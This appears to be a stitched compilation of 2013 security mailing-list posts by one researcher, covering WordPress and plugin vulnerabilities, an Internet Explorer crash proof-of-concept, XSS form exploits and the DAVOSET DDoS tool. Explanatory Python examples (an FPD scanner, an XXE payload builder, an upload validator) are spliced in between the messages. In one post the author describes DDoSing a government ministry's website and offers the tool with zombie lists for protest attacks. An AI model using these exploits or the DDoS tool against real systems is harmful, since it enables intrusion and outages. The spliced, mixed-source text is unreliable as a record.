These are hiddenly fixed vulnerabilities in WordPress versions 3.5 and 3.5.1. The developers of WP intentionally haven't written about them to decrease the official number of fixed holes. Which is typical for them - since 2007 they have often hidden fixed vulnerabilities.

As I wrote in July (http://websecurity.com.ua/6634/), there are multiple vulnerabilities in the Akismet plugin, which is bundled with the core of WordPress, so all holes in this plugin are directly related to WP. But the developers typically fix holes in Akismet without mentioning them among those fixed in WP (in the official announcement); they didn't even mention the update of the plugin's version in the announcement or the Codex. They did write about fixed holes in the plugin's changelog, but didn't write about the fixed holes which I reported in 2012 (and didn't fix all the holes). So these vulnerabilities were hiddenly fixed in WP 3.5 and 3.5.1 and are only mentioned in the changelog (http://wordpress.org/plugins/akismet/changelog/).

WordPress 3.5.1:

In this version of WP, Akismet was updated from 2.5.6 to 2.5.7. In it a few Full path disclosure vulnerabilities were fixed and a .htaccess was added to block direct access to the plugin's files (which can be used for protecting against the FPD, XSS and Redirector vulnerabilities disclosed by me in 2012).

Vulnerable are WordPress 3.5 and previous versions.

WordPress 3.5.2:

In this version of WP, Akismet was updated from 2.5.7 to 2.5.8. In it there are security improvements (they didn't specify the details).

Vulnerable are WordPress 3.5.1 and previous versions.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Re: [Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.6 and 3.6.1
Hello Ryan!

There are many cases of different classes of vulnerabilities hiddenly fixed in WordPress (during 2007-2013 I wrote about many such cases, including in English in security mailing lists). These FPD vulnerabilities are just particular examples for WP 3.6 and 3.6.1. The main point is that the WP developers have for a long time been doing such a bad thing as hidden fixing of holes, and it must never be done for any class of vulnerabilities.

Concerning Full Path Disclosure holes in WordPress. On 24.03.2013 I checked different versions of WP and found all external (not in the admin panel) FPD holes in them with my tool FPD Finder. Particularly in WordPress 3.3.1 (which was the last version at that time) I found 176 FPD holes. The amount of such holes is increasing all the time, because the WP developers ignore them.

I know about YEHG's inspathx tool, but I don't like to use other tools and like to make and use my own tools. So I made my tool FPD Finder at the beginning of 2012 and ran tests for FPD holes in different web applications, including WordPress. When I find the time and desire to publish the WP results and the tool itself, I'll do it. Last year I wrote about FPD vulnerabilities in MODx (which I found in May 2012 with my tool) - I also disclosed it to this list (http://lists.grok.org.uk/pipermail/full-disclosure/2012-November/088924.html). So results of the work of FPD Finder are already available to the public.

> WordPress's stance on this is:
>
> "Why are there path disclosures when directly loading certain files?
> This is considered a server configuration problem. Never enable
> display_errors on a production site."

This is the default PHP configuration (so all holes are a priori valid). So it's up to the developers to manually prevent FPD in all their php-scripts. Since they are lazy (don't do it) and lamers (don't understand the holes), hence the large amount of FPD holes. As with all other holes in this and all those web applications about whose vulnerabilities have been written during the whole history of the WWW.

> WordPress do not consider this a security bug and instead a configuration
> problem.

A lot of lamers do the same. As a lot of lamers don't consider any arbitrary class of vulnerabilities (which exists in the WASC and OWASP classifications) as a hole - I have seen it all the time during the last 9 years. Which doesn't change anything - the holes are indeed holes regardless of the point of view of individual developers.

> They will not fix any and therefore WordPress is absolutely full of FPD issues.

As it always was, is and will be. Until the developers change their opinion and start fixing them.

But the main point in my letter was that the developers regularly fix some of the FPD holes. Sometimes they mention them in the "fixed bugs" section, sometimes not, but there were cases where they fixed an FPD and wrote about it in the announcement as a vulnerability (like in version 3.5.2). And all FPD holes must be handled in the same way, not just those in the "directly loaded certain files" position, but all the others too (now the developers have a different approach to them). And not ignore all FPD, but exactly fix all FPD. And the holes which I wrote about are exactly not "directly loaded certain files", but FPD at certain actions on the web site, so the developers fixed them. But they didn't mention them officially. Yet they did write in the announcement about the FPD in WP 3.5.2 (http://wordpress.org/news/2013/06/wordpress-3-5-2/). So it's double standards, which is unacceptable for any developer.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: Ryan Dewhurst
To: MustLive
Cc: submissi...@packetstormsecurity.org ; full-disclosure
Sent: Saturday, November 30, 2013 10:19 PM
Subject: Re: [Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.6 and 3.6.1

Although I do not agree with this point, WordPress's stance on this is:

"Why are there path disclosures when directly loading certain files? This is considered a server configuration problem. Never enable display_errors on a production site." - http://codex.wordpress.org/Security_FAQ#Why_are_there_path_disclosures_when_directly_loading_certain_files.3F

WordPress do not consider this a security bug and instead a configuration problem. They will not fix any and therefore WordPress is absolutely full of FPD issues.

I did some research back in 2011 and found that the first version of WordPress I could install (0.71-gold) had 44 FPDs, whereas the latest at the time of the research (3.2.1) had 155 FPDs - http://www.ethicalhack3r.co.uk/full-path-disclosure-fpd/

Here is every FPD issue I identified from version 0.71-gold to version 3.2.1 - http://ethicalhack3r.co.u
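Both messages in this thread describe the same hunt: request a plugin's PHP files directly (or trigger an error path) and read the server's absolute path out of the PHP diagnostic that display_errors prints. The script below is an added example written for this page; it is not MustLive's FPD Finder, not inspathx, and not WordPress code. It extracts the disclosed path from Unix and Windows style PHP error messages, takes an injected fetch function so it can be run offline against the constructed sample responses embedded in it (the URLs, plugin name and paths are invented), and derives the document root that an attacker would then feed into LFI or log-poisoning attempts.

```python
import re
from typing import Callable, Dict, List

# Constructed sample responses, shaped like what a PHP host with
# display_errors=On and html_errors=On returns when a plugin file is
# requested directly. Not real WordPress output; paths are invented.
SAMPLE_RESPONSES: Dict[str, str] = {
    "http://site/wp-content/plugins/example/helper.php":
        "<br />\n<b>Fatal error</b>:  Call to undefined function add_action() "
        "in <b>/var/www/html/wp-content/plugins/example/helper.php</b> "
        "on line <b>12</b><br />\n",
    "http://site/wp-content/plugins/example/view.php":
        "<br />\n<b>Warning</b>:  require_once(../../config.php): failed to open "
        "stream: No such file or directory in "
        "<b>C:\\inetpub\\wwwroot\\wp-content\\plugins\\example\\view.php</b> "
        "on line <b>3</b><br />\n",
    "http://site/wp-content/plugins/example/index.php": "",  # guarded: no output
}

# A PHP diagnostic ends with "in <absolute path> on line N"; the <b> tags are
# present only with html_errors=On. Unix and Windows roots are both matched.
_PHP_ERROR_RE = re.compile(
    r"\b(?:Fatal error|Warning|Notice|Parse error|Deprecated)\b.*?"
    r" in (?:<b>)?((?:/|[A-Za-z]:\\)[^<\n]+?)(?:</b>)? on line",
    re.S,
)


def extract_paths(body: str) -> List[str]:
    """Absolute server paths disclosed by PHP error messages in `body`."""
    return _PHP_ERROR_RE.findall(body)


def scan(fetch: Callable[[str], str], urls: List[str]) -> Dict[str, List[str]]:
    """Request each URL through `fetch`; return {url: [disclosed paths]} for
    the ones that leak. `fetch` is injected so the scan runs offline here; in
    practice it wraps urllib.request.urlopen(url).read().decode()."""
    findings: Dict[str, List[str]] = {}
    for url in urls:
        paths = extract_paths(fetch(url))
        if paths:
            findings[url] = paths
    return findings


def webroot_from(path: str) -> str:
    """Document root implied by a disclosed path: everything before the
    wp-content segment. Handles both path separators."""
    sep = "\\" if "\\" in path else "/"
    parts = path.split(sep)
    if "wp-content" not in parts:
        return ""
    return sep.join(parts[: parts.index("wp-content")])


if __name__ == "__main__":
    hits = scan(lambda u: SAMPLE_RESPONSES[u], list(SAMPLE_RESPONSES))
    for url, paths in hits.items():
        print(url, "->", paths, "webroot:", webroot_from(paths[0]))
```

The server-side fix the thread argues about is two-sided: display_errors=Off (with log_errors=On) in php.ini stops the leak regardless of code quality, and a guard at the top of each plugin file (for WordPress, the usual defined('ABSPATH') or exit) stops the file from doing anything when loaded directly, so there is no error to print in the first place.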
Re: [Full-disclosure] DAVOSET v.1.1.4
Hello psy!

I suggest you watch my videos from Euromaydan in Kyiv (http://www.youtube.com/user/MustLiveUA/videos). If you look at the three videos from 01.12.2013, which I recorded at Independence Square (two blocks from the President's administration, where the events shown in that video at rutube took place), you will see a different picture. All protests were and are going peacefully. You can see it in all my videos. While during the two hours I was in the center of the city and recorded those three videos I didn't see any fighting or assaults, and I haven't heard about such actions from more than half a million people - everything was calm - at the same time there was an assault on the President's administration (shown in that video). I saw similar videos in the news only when I came home. It's just one such episode; there are many more episodes of police brutality. And I and other Ukrainian hackers are protesting "online" exactly against police cruelty on duty for the authoritarian regime, and against it all people are protesting "offline".

On 24.11 and some other days there were cases where the police kicked some people (including opposition deputies), but without large confrontation. Everything changed on the morning of Saturday (http://24tv.ua/home/showSingleNews.do?krivava_subota_30_listopada_u_faktah_foto_video&objectId=388037). Those events near the President's administration on 01.12 were made by provocateurs - to force the president to declare a state of emergency. But it hasn't helped and he didn't declare it. So always watch different videos to better understand the situation.

> If you find some, please, give to them a message: "The hottest places in
> hell are reserved for those who in times of moral crisis maintain their
> neutrality."

Yes, I agree with you. There are such people. I hope there will be no such hackers in Ukraine. Now is the time to stand against the regime together. And I hope that my tool DAVOSET will help people all around the world, especially for protests.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

- Original Message -
From: "psy"
To: "MustLive"
Cc:
Sent: Wednesday, December 04, 2013 3:15 AM
Subject: Re: [Full-disclosure] DAVOSET v.1.1.4

On 03/12/13 22:57, MustLive wrote:
> Hello participants of Mailing List.
>
> At 01.12.2013, when I started DDoSing web site of Ministry of Internal
> Affairs of Ukraine with my tool DAVOSET (during protest against cruel
> police actions on Saturday in Kyiv against people at Euromaydan)

Wow! Amazing what's going on in Kiev: http://rutube.ru/video/5c49a9649614e053aee854767b1a0795/

And also, around the world...

But there is something more amazing, which is to watch how some supposedly 'ethical/white-hat/famous' hackers are taking money from big companies co-defending corrupt governments, every day. They have the opportunity to leak important information that feeds police states of terror, but they prefer to be silent like bitches.

If you find some, please give them a message: "The hottest places in hell are reserved for those who in times of moral crisis maintain their neutrality."

> Video demonstration of DAVOSET:
> http://www.youtube.com/watch?v=RKi35-f346I

Big work, mr. MustLive. It would be nice if you showed results on the server side.

Kisses!

psy

> Download DAVOSET v.1.1.4:
> http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.4.rar
[Full-disclosure] DAVOSET v.1.1.4
Hello participants of Mailing List.

On 01.12.2013, when I started DDoSing the web site of the Ministry of Internal Affairs of Ukraine with my tool DAVOSET (during the protest against the cruel police actions on Saturday in Kyiv against people at Euromaydan), I found that there was a bug in the software concerning two sites from list_full.txt, and also there were some non-working sites. Which I've fixed.

After making the public release of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-June/008850.html), I've made the next update of the software. On 3rd of December DAVOSET v.1.1.4 was released - DDoS attacks via other sites execution tool (http://websecurity.com.ua/davoset/).

Video demonstration of DAVOSET:
http://www.youtube.com/watch?v=RKi35-f346I

Download DAVOSET v.1.1.4:
http://websecurity.com.ua/uploads/2013/DAVOSET_v.1.1.4.rar

Use, don't abuse.

In the new version a new service was added into the full list of zombies, non-working services were removed from the lists of zombies and one bug was fixed. So now you have up-to-date software with fresh lists of zombies for participating in protest actions.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Vulnerabilities hiddenly fixed in WordPress 3.6 and 3.6.1
Hello list!

In July I wrote about one vulnerability in WordPress which was hiddenly fixed in version 3.5.2 (http://securityvulns.ru/docs29555.html). Here are new ones.

These are hiddenly fixed vulnerabilities in WordPress versions 3.6 and 3.6.1. The developers of WP intentionally haven't written about them to decrease the official number of fixed holes. Which is typical for them - since 2007 they have often hidden fixed vulnerabilities.

As I wrote in September (http://websecurity.com.ua/6795/), there are 9 FPD vulnerabilities which were hiddenly fixed in WP 3.6. They were not mentioned in the announcement, only mentioned in the Codex (as "bugs"). Yet there were cases when the WP developers wrote about fixed FPD in official announcements.

Full path disclosure (WASC-13):

In Media Library if an attachment parent does not exist.
In function parent_dropdown().
In function wp_new_comment().
In function mb_internal_encoding().
At processing of image metadata.
In function get_post_type_archive_feed_link().
In function WP_Image_Editor::multi_resize().
In function wp_generate_attachment_metadata().
At deleting or restoring an item that no longer exists.

Vulnerable are WordPress 3.5.2 and previous versions.

As I wrote in November (http://websecurity.com.ua/6904/), there are 3 FPD vulnerabilities which were hiddenly fixed in WP 3.6.1. They were not mentioned in the announcement or the Codex. Yet there were cases when the WP developers wrote about fixed FPD in official announcements.

Full path disclosure (WASC-13):

In function get_allowed_mime_types().
In function set_url_scheme().
In function comment_form().

Vulnerable are WordPress 3.6 and previous versions.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Day of bugs in WordPress 3
Hello participants of Mailing List.

After you've watched my video demonstration of DAVOSET - DDoS attacks via other sites execution tool (http://www.youtube.com/watch?v=RKi35-f346I) and my other videos on security and non-security topics (http://www.youtube.com/user/MustLiveUA/videos), including videos from the events in Kyiv, Ukraine, here is news for you.

As I announced last week at my site, today I'll conduct a new project - Day of bugs in WordPress 3. Such projects lead to improving the security of web applications and to increasing the awareness of web developers.

After conducting Month of Search Engines Bugs (http://websecurity.com.ua/category/moseb/) in June 2007 and Month of Bugs in Captchas (http://websecurity.com.ua/category/mobic/) in November 2007 and many other projects during 2007-2008, I conducted the projects Day of bugs in WordPress in December 2007 and Day of bugs in WordPress 2 in July 2010. In the first "Day of bugs in WordPress" project I disclosed 81 vulnerabilities in WP; in the second I disclosed 8 interesting vulnerabilities. In the new project I'll disclose new interesting vulnerabilities in WP.

Similarly to the previous two Day of bugs in WordPress projects, this project will be interesting for every user of WordPress, for the developers of WordPress, for every web developer who is using WP, for everyone who is interested in WP, and it will draw the attention of all web developers to the security of web applications.

But before disclosing vulnerabilities from the project, I'll write about multiple hiddenly fixed vulnerabilities in the last versions of WordPress.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] Code Execution vulnerability in Contact Form 7 for WordPress
Hello list!

I want to inform you about a vulnerability in the Contact Form 7 plugin for WordPress. This is a Code Execution via Arbitrary File Uploading vulnerability.

- Affected products: -

Vulnerable are Contact Form 7 3.5.2 and previous versions. After my informing, the developer released version 3.5.3 with a fix.

- Affected vendors: -

Contact Form 7
http://contactform7.com

-- Details: --

Code Execution (WASC-31):

The attack goes via the uploader. For code execution it's needed to upload phtml (on web servers with PHP) or asp/aspx (on IIS) files.

The attack can be made both by a user with admin rights (to make an appropriate contact form with an uploader tag) and by an unauthenticated user, if there is already an appropriate contact form at the web site (made by an unsuspecting admin).

For the first scenario the attack process is the following. An attacker with admin access adds an uploader tag into a contact form at the site and uses it for a CE via AFU attack. There must be an uploader tag in the contact form and it's needed to set the allowed extension for it (because besides the list of forbidden extensions, the plugin also has a list of allowed extensions and there are no scripts among them).

[file file-423 filetypes:phtml]

The files are uploaded into the folder:

http://site/wp-content/uploads/wpcf7_uploads/

At creation of this folder the file .htaccess is created (with content: Deny from all). It can be bypassed when using other web servers besides Apache (where .htaccess is ignored), or on Apache it's possible to use vulnerabilities in WP for file deletion, or via an LFI vulnerability to include a file from this folder.

Timeline:

2013.09.28 - announced at my site.
2013.10.01 - informed developer.
2013.10.03-21 - conversation with developer about this and other vulnerabilities in CF7.
2013.10.09 - plugin version 3.5.3 was released.
2013.11.21 - disclosed at my site (http://websecurity.com.ua/6799/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] DoS vulnerability in Internet Explorer 6, 7, 8 (access violation)
Hello list!

I want to warn you about a Denial of Service vulnerability in Internet Explorer. This is an access violation. This exploit is based on the exploit by Asesino04 for IE7. As I've tested, it also works in IE6 and IE8.

- Affected products: -

Vulnerable are Internet Explorer 6 (6.0.2900.2180), Internet Explorer 7 (7.00.5730.13), Internet Explorer 8.0 (8.00.6001.18702) and previous versions of these browsers. IE 9, 10 and 11 were not tested, but potentially they can be vulnerable.

-- Details: --

Denial of Service (WASC-10):

The browser crashes at access by id to an element of the web page via the method document.getElementById. In IE 6 and 7 the browser crashes, but in IE8 the tab is automatically restarted after the error message (this functionality appeared in IE8).

PoC / Exploit:

<html>
<head>
<title>Internet Explorer 6, 7 & 8 DoS Exploit.</title>
<script>
function over_trigger() {
  var obj_col = document.getElementById("132");
  obj_col.width = 42765;
  obj_col.span = 1000;
}
setTimeout("over_trigger()",1);
</script>
</head>
<body>
http://websecurity.com.ua
<table>
<col id="132">
</table>
</body>
</html>

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] BF, LE and IAA vulnerabilities in InstantCMS
Hello list!

In addition to the multiple vulnerabilities in InstantCMS which I disclosed earlier, here are new ones. These are Brute Force, Login Enumeration and Insufficient Anti-automation vulnerabilities in InstantCMS.

- Affected products: -

Vulnerable are InstantCMS 1.10.3 and previous versions.

- Affected vendors: -

InstantSoft
http://www.instantcms.ru

-- Details: --

Brute Force (WASC-11):

In the login form there is no protection from Brute Force attacks.

http://site/admin/login.php
http://site/login

The BF vulnerabilities I found in older versions of the engine. In InstantCMS 1.10.1, according to the changelog, the BF holes were fixed by adding a captcha. Checking at the official web site didn't reveal any captcha, so this fix for both BF holes wasn't verified and the captcha wasn't tested (how secure it is; as I showed in my Month of Bugs in Captchas in 2007, captchas can be very insecure). Plus a lot of sites use older versions of InstantCMS, and with all the mentioned Login Enumeration vulnerabilities in InstantCMS, these BF holes are very actual.

Login Enumeration (WASC-42):

In the registration form (http://site/registration) logins are enumerated via ajax-requests.

Insufficient Anti-automation (WASC-21):

The presence of the captcha in the registration form (for protecting against automated registration) doesn't protect from automated login enumeration. The requests are sent to the script http://site/core/ajax/registration.php.

Timeline:

2013.07.14 - found multiple vulnerabilities in InstantCMS 1.10.1.
2013.07.19 - informed developers about the first part of the vulnerabilities. Ignored.
2013.07.31 - informed developers about another part of the vulnerabilities. Answered, but refused to fix.
2013.08.02 - reminded developers about the first letter with holes and explained why to fix them.
2013.08.02 - developers released InstantCMS 1.10.2 without fixing any of the reported vulnerabilities.
2013.09.24 - announced at my site.
2013.10.15 - developers released InstantCMS 1.10.3 without fixing any of the reported vulnerabilities.
2013.11.15 - disclosed at my site (http://websecurity.com.ua/6785/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] XSS and FPD vulnerabilities in LBG Zoom In/Out Effect Slider for WordPress
Hello list!

I want to inform you about vulnerabilities in the LBG Zoom In/Out Effect Slider plugin for WordPress, in addition to one XSS in this plugin which was disclosed earlier (http://packetstormsecurity.com/files/123367/WordPress-LBG-Zoominoutslider-Cross-Site-Scripting.html). These are Cross-Site Scripting and Full path disclosure vulnerabilities. Altogether 26 new holes: 24 XSS and 2 FPD vulnerabilities.

- Affected products: -

Vulnerable are all versions of the plugin LBG Zoom In/Out Effect Slider for WordPress.

-- Details: --

Cross-Site Scripting (WASC-08):

XSS in files add_playlist_record.php and settings_form.php.

LBG Zoominoutslider XSS.html

LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post">
value='">alert(document.cookie)'>

LBG Zoominoutslider XSS-2.html

LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post">
value='">alert(document.cookie)'>

LBG Zoominoutslider XSS-3.html

LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post">
value='">alert(document.cookie)'>

LBG Zoominoutslider XSS-4.html

LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post">
value='">alert(document.cookie)'>

LBG Zoominoutslider XSS-5.html

LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post">
value='alert(document.cookie)'>

LBG Zoominoutslider XSS-6.html

LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post">
value='">alert(document.cookie)'>

LBG Zoominoutslider XSS-7.html

LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post">
value='">alert(document.cookie)'>

LBG Zoominoutslider XSS-8.html

LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/add_playlist_record.php"; method="post">
value='">alert(document.cookie)'>

LBG Zoominoutslider XSS-9.html

LBG Zoom In/Out Effect Slider for WordPress XSS exploit (C) 2013 MustLive. http://websecurity.com.ua
action="http://site/wp-content/plugins/lbg_zoominoutslider/tpl/settings_form.php"; method="post">
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='">alert(document.cookie)'>
value='alert(document.cookie)'>
value='">alert(document.cookie)'>
value='alert(document.cookie)'>

Full path disclosure (WASC-13):

http://site/wp-content/plugins/lbg_zoominoutslider/tpl/banners.php
http://site/wp-content/plugins/lbg_zoominoutslider/tpl/playlist.php

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
[Full-disclosure] XXE Injection in Spring Framework
Hello!

I'll give you additional information concerning the advisory XML External Entity (XXE) Injection in Spring Framework (http://securityvulns.ru/docs29758.html).

- Affected products: -

- 3.0.0 to 3.2.3 (Spring OXM & Spring MVC)
- 4.0.0.M1 (Spring OXM)
- 4.0.0.M1-4.0.0.M2 (Spring MVC)
- Earlier unsupported versions may also be affected

- Affected vendors: -

Spring by Pivotal.

-- Details: --

The Spring OXM wrapper doesn't disable external entity resolution when using the JAXB unmarshaller (SAXSource and StreamSource instances are vulnerable). Also Spring MVC processes user-provided XML with JAXB in combination with a StAX XMLInputFactory without disabling external entity resolution.

Besides the standard vectors of attacks with XXE Injection vulnerabilities (such as local file inclusion), which are usually mentioned in advisories, XXE Injection also allows conducting attacks on other sites. And with DAVOSET (DDoS attacks via other sites execution tool) it's possible to automate such attacks. I wrote about such attacks in my 2012 article "Using XML External Entities (XXE) for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2012-August/008481.html) and the 2013 one "Using XXE vulnerabilities for attacks on other sites" (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-August/008887.html).

As I described in my articles, XXE vulnerabilities can be used for conducting CSRF and DoS attacks on other sites (and by using multiple web sites it's possible to conduct DDoS attacks). And my tool DAVOSET can be used for conducting such attacks via XXE vulnerabilities. In October I released a video demonstration of DAVOSET:

http://www.youtube.com/watch?v=RKi35-f346I

So all vulnerable web applications with affected versions of Spring Framework can be used for attacks on other sites via XXE Injection.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
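The message above describes the "attack on other sites" use of XXE: a parser that resolves external general entities will fetch whatever URL the attacker's DOCTYPE names, so the vulnerable server becomes the request source. The block below is an added example for this page, not Spring or DAVOSET code, written in Python's stdlib expat rather than the Java StAX/JAXB stack the advisory concerns. It builds the kind of document an attacker submits (the target URL is a placeholder), lists the SYSTEM identifiers a document declares without resolving any of them, and shows the hardened parse that rejects any DOCTYPE outright, which is the same policy as turning DTD support off in the real parser.

```python
import xml.parsers.expat as expat
from typing import List, Optional


def xxe_fetch_payload(target_url: str) -> bytes:
    """Document an attacker submits to a parser that resolves external general
    entities: resolving &ext; makes the *server* request `target_url`, which is
    how one vulnerable site is turned into a request source against another.
    Constructed example; the URL is whatever the attacker chooses."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE data [\n"
        f'  <!ENTITY ext SYSTEM "{target_url}">\n'
        "]>\n"
        "<data>&ext;</data>\n"
    ).encode()


def external_entity_system_ids(document: bytes) -> List[str]:
    """SYSTEM identifiers of all external entities declared in the document's
    DTD, collected without resolving any of them. pyexpat only fetches an
    external entity when an ExternalEntityRefHandler is installed, and none is
    installed here, so this inspection is safe on untrusted input."""
    found: List[str] = []

    def on_entity_decl(name, is_param, value, base, system_id, public_id, notation):
        if system_id is not None:
            found.append(system_id)

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    try:
        parser.Parse(document, True)
    except expat.ExpatError:
        pass  # malformed input: declarations seen before the error still count
    return found


class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DOCTYPE."""


def root_element_of_untrusted(document: bytes) -> Optional[str]:
    """Hardened parse: refuse any document with a DOCTYPE (so no entity
    declaration, external or internal, is processed at all) and return the
    root element name. Refusing DTDs also shuts out entity-expansion DoS."""
    root: Optional[str] = None

    def on_doctype(name, system_id, public_id, has_internal_subset):
        raise UnsafeXML("DOCTYPE is not allowed in untrusted input")

    def on_start(name, attrs):
        nonlocal root
        if root is None:
            root = name

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.Parse(document, True)
    return root


if __name__ == "__main__":
    payload = xxe_fetch_payload("http://site2/")
    print("declared external entities:", external_entity_system_ids(payload))
    try:
        root_element_of_untrusted(payload)
    except UnsafeXML as exc:
        print("rejected:", exc)
```

On the Java side the advisory's fix is the equivalent setting on the factory that Spring MVC uses: XMLInputFactory.SUPPORT_DTD set to false (and IS_SUPPORTING_EXTERNAL_ENTITIES to false as a second line of defence) before any user-supplied XML reaches the JAXB unmarshaller.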
[Full-disclosure] AFU and IL vulnerabilities in Uploadify
Hello list!

These are Arbitrary File Uploading and Information Leakage vulnerabilities in Uploadify. The same as in June with the previous vulnerabilities in Uploadify, in September the developers just ignored my warnings, even though I sent the letter to multiple of their e-mail addresses.

- Affected products: -

Vulnerable are Uploadify v3.2.1 and previous versions.

- Affected vendors: -

Reactive Apps
http://www.uploadify.com

-- Details: --

Arbitrary File Uploading (WASC-31):

Code Execution attack via file uploading. There are two methods of code execution: by using the symbol ";" (1.asp;.jpg) in the file name (IIS) and by double extension (1.php.jpg) (Apache with special configuration).

Information Leakage (WASC-13):

Checking arbitrary file existence at the server.

Uploadify IL.html

Uploadify Information Leakage exploit (C) 2013 MustLive. http://websecurity.com.ua
http://site/uploadify/check-exists.php"; method="post">

Timeline:

2013.09.20 - announced at my site.
2013.09.21 - informed developers on multiple e-mails.
2013.10.24 - disclosed at my site (http://websecurity.com.ua/6777/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
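The Uploadify advisory above and the Contact Form 7 advisory earlier on this page show the three ways an upload filter is usually beaten: a "1.asp;.jpg" name that IIS 6 parses as .asp, a "1.php.jpg" name that an Apache host with a loose AddHandler executes as PHP, and an admin allow-list (the CF7 filetypes:phtml tag) that itself contains an executable extension. The validator below is an added example written for this page, not code from Uploadify, Contact Form 7 or WordPress. The executable-extension list is an assumption to be extended for your own stack; the rule order is the point: executable extensions are refused before the allow-list is consulted, so no allow-list can re-enable them, and the stored name never contains anything the client chose.

```python
import secrets
from typing import Iterable, NamedTuple

# Extensions a PHP (Apache/nginx) or IIS host executes or treats as server
# code. Assumed list for this example; extend it for your own stack.
EXECUTABLE_EXTENSIONS = frozenset({
    "php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps",
    "asp", "aspx", "asa", "ashx", "asmx", "cer",
    "jsp", "jspx", "cgi", "pl", "py", "sh", "htaccess",
})


class Verdict(NamedTuple):
    accepted: bool
    reason: str


def check_upload_name(filename: str, allowed: Iterable[str]) -> Verdict:
    """Decide whether `filename` may be stored at all.

    Executable extensions are refused before the allow-list is consulted, so
    an admin allow-list containing "phtml" does not help the attacker. The
    ';' rule covers "1.asp;.jpg" (IIS 6 stops parsing at the semicolon) and
    the multiple-extension rule covers "1.php.jpg" on Apache hosts whose
    AddHandler matches any dotted segment.
    """
    name = filename.replace("\\", "/").rsplit("/", 1)[-1]   # drop any path part
    if "\x00" in name or ";" in name:
        return Verdict(False, "NUL or ';' in name")
    name = name.rstrip(". ")                  # Windows strips trailing dots/spaces
    if not name or name.startswith("."):
        return Verdict(False, "empty name or dot-file")
    segments = name.lower().split(".")
    if len(segments) < 2:
        return Verdict(False, "no extension")
    exts = segments[1:]
    for ext in exts:
        if ext in EXECUTABLE_EXTENSIONS:
            return Verdict(False, f"executable extension '.{ext}'")
    if len(exts) > 1:
        return Verdict(False, "multiple extensions")
    allow = {a.lower().lstrip(".") for a in allowed}
    if exts[0] not in allow:
        return Verdict(False, f"'.{exts[0]}' not in allow-list")
    return Verdict(True, "ok")


def storage_name(filename: str, allowed: Iterable[str]) -> str:
    """Name to store the file under: a random token plus the validated
    extension, so nothing the client chose reaches the filesystem.
    Raises ValueError with the verdict's reason on rejection."""
    verdict = check_upload_name(filename, allowed)
    if not verdict.accepted:
        raise ValueError(verdict.reason)
    ext = filename.rstrip(". ").rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(16)}.{ext}"


if __name__ == "__main__":
    allowed = {"jpg", "png", "pdf"}
    for candidate in ("photo.jpg", "1.asp;.jpg", "1.php.jpg", "shell.phtml"):
        print(candidate, "->", check_upload_name(candidate, allowed))
    print("stored as:", storage_name("photo.jpg", allowed))
```

Renaming is what makes the .htaccess "Deny from all" in the Contact Form 7 upload directory a second layer rather than the only one: if the stored file can never carry a server-side extension, moving the site to nginx or IIS (where that .htaccess is ignored) does not turn the upload directory into a web shell drop.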
[Full-disclosure] Multiple vulnerabilities in mp3-player
